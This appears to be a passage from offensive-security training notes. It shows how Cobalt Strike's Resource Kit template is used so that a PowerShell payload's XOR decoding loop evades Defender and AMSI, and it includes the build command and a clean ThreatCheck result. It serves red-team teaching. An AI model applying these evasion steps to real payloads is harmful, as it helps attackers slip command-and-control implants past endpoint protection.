Resource Kit

The Resource Kit can be found in C:\Tools\cobaltstrike\arsenal-kit\kits\resource. The portion of the ThreatCheck output that we want to pay attention to is the for loop.

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

\

The 64-bit stageless PowerShell payload is taken from template.x64.ps1. Interestingly, if we open it in Visual Studio Code, we see the following on lines 26-28:

for ($zz = 0; $zz -lt $v_code.Count; $zz++) {
	$v_code[$zz] = $v_code[$zz] -bxor 35
}

\

HelpSystems have already provided a template with different variable names - $zz in place of $x and $v_code in place of $var_code. This will bypass Defender as it is, so we don't actually need to modify it. As before, use the included build script and specify an output directory, then load resources.cna into Cobalt Strike.

./build.sh /mnt/c/Tools/cobaltstrike/resources
[Resource Kit] [+] Copy the resource files
[Resource Kit] [+] Generate the resources.cna from the template file.
[Resource Kit] [+] The resource kit files are saved in '/mnt/c/Tools/cobaltstrike/resources'

\

Regenerate your payloads for the final time.

PS C:\Users\Attacker> C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f C:\Payloads\http_x64.ps1 -e AMSI
[+] No threat found!
[*] Run time: 0.34s